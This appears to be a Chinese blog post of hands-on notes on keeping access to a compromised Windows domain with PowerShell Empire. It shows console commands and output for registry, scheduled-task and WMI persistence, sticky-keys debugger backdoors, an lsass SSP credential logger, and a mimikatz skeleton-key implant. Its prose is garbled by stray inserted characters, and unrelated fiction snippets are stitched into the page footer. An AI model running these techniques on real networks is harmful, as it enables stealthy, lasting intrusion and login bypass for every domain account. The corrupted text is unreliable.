使用Powershell框架Empire進行權限維持

這是緊接著上一步

elevated——權限維持

注冊表

(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/registry) > 
Registry persistence established using listener test stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

因為是開機啟動脆淹,所以會彈個黑框

計劃任務schtasks

(Empire: powershell/persistence/elevated/schtasks) > set Listener test
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/schtasks) > 
成功: 成功創(chuàng)建計劃任務 "Updater"常空。
Schtasks persistence established using listener test stored in HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 09:00.

wmi

(Empire: powershell/persistence/elevated/wmi) > set Listener test
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.

查看的方法參考

運行結果

第一個很明顯是注冊表的,后兩者都提權為system權限了

(Empire: FZUB5V31) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  FZUB5V31        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\Administrator powershell/2736     5/0.0    2017-08-18 10:28:13
  E1MPZRLB        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/3624     5/0.0    2017-08-18 10:28:15
  NY76AGRX        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/740      5/0.0    2017-08-18 10:28:14

PowerBreach

deaduser刪除指定賬戶時觸發(fā)執(zhí)行
eventlog定時查看事件日志盖溺,當有指定值如Hack時觸發(fā)漓糙,需要管理員權限執(zhí)行
resolver定時解析域名,當滿足指定ip時觸發(fā)

UserLand

顧名思義用戶登陸時觸發(fā)咐柜。registry schtasks跟前面的重復兼蜈,backdoor_lnk是構造一個特殊的快捷方式。(但是設置C:\test.LNK并沒有發(fā)現(xiàn)生成成功)

Misc

add_sid_history:調用Mimikatz的misc::addsid拙友,結果ERROR mimikatz_doLocal ; "addsid" command of "misc" module not found !
debugger :給sethc.exe, Utilman.exe, osk.exe, Narrator.exe, or Magnify.exe添加debugger
disable_machine_acct_change: 禁用必須修改密碼的策略

ssp

Security Support Provider为狸,直譯為安全支持提供者,又名Security Package.
簡單的理解為SSP就是一個DLL遗契,用來實現(xiàn)身份認證辐棒,例如:

NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)

SSPISecurity Support Provider Interface,直譯為安全支持提供程序接口,是Windows系統(tǒng)在執(zhí)行認證操作所使用的API漾根。 簡單的理解為SSPI是SSP的API接口
LSALocal Security Authority鸭你,用于身份認證,常見進程為lsass.exe
特別的地方在于LSA是可擴展的尚猿,在系統(tǒng)啟動的時候SSP會被加載到進程lsass.exe中.
這相當于我們可以自定義一個dll澈蝙,在系統(tǒng)啟動的時候被加載到進程lsass.exe!
get_ssp查看當前的ssp列表寄疏。
install_ssp允許你安裝指定dll是牢。
memssp會記錄所有的認證事件到C:\Windows\System32\mimisla.log.Should be reboot persistent.
實際測試根本就沒有生成那個log文件,操作系統(tǒng)2008 R2 x64陕截。

skeleton_key

(Empire: powershell/persistence/misc/skeleton_key) > 
Job started: C175UZ
Hostname: WIN-EGQU692VVEO.test.com / authority\system-authority\system
  .#####.   mimikatz 2.1 (x64) built on Dec 11 2016 18:05:17
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Skeleton key implanted. Use password 'mimikatz' for access.

親測可用驳棱,任意用戶名加上密碼mimikatz就能登陸。

最后編輯于
?著作權歸作者所有,轉載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末农曲,一起剝皮案震驚了整個濱河市社搅,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌乳规,老刑警劉巖形葬,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異驯妄,居然都是意外死亡荷并,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進店門青扔,熙熙樓的掌柜王于貴愁眉苦臉地迎上來源织,“玉大人,你說我怎么就攤上這事微猖√赶ⅲ” “怎么了?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵凛剥,是天一觀的道長侠仇。 經(jīng)常有香客問我,道長犁珠,這世上最難降的妖魔是什么逻炊? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任,我火速辦了婚禮犁享,結果婚禮上余素,老公的妹妹穿的比我還像新娘。我一直安慰自己炊昆,他們只是感情好桨吊,可當我...
    茶點故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布威根。 她就那樣靜靜地躺著,像睡著了一般视乐。 火紅的嫁衣襯著肌膚如雪洛搀。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天佑淀,我揣著相機與錄音留美,去河邊找鬼。 笑死渣聚,一個胖子當著我的面吹牛独榴,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播奕枝,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼瓶堕!你這毒婦竟也來了隘道?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤郎笆,失蹤者是張志新(化名)和其女友劉穎谭梗,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體宛蚓,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡激捏,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了凄吏。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片远舅。...
    茶點故事閱讀 40,675評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖痕钢,靈堂內(nèi)的尸體忽然破棺而出图柏,到底是詐尸還是另有隱情,我是刑警寧澤任连,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布蚤吹,位于F島的核電站,受9級特大地震影響随抠,放射性物質發(fā)生泄漏裁着。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一拱她、第九天 我趴在偏房一處隱蔽的房頂上張望二驰。 院中可真熱鬧,春花似錦椭懊、人聲如沸诸蚕。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽背犯。三九已至坏瘩,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間漠魏,已是汗流浹背倔矾。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留柱锹,地道東北人哪自。 一個月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓,卻偏偏與公主長得像禁熏,于是被迫代替她去往敵國和親壤巷。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容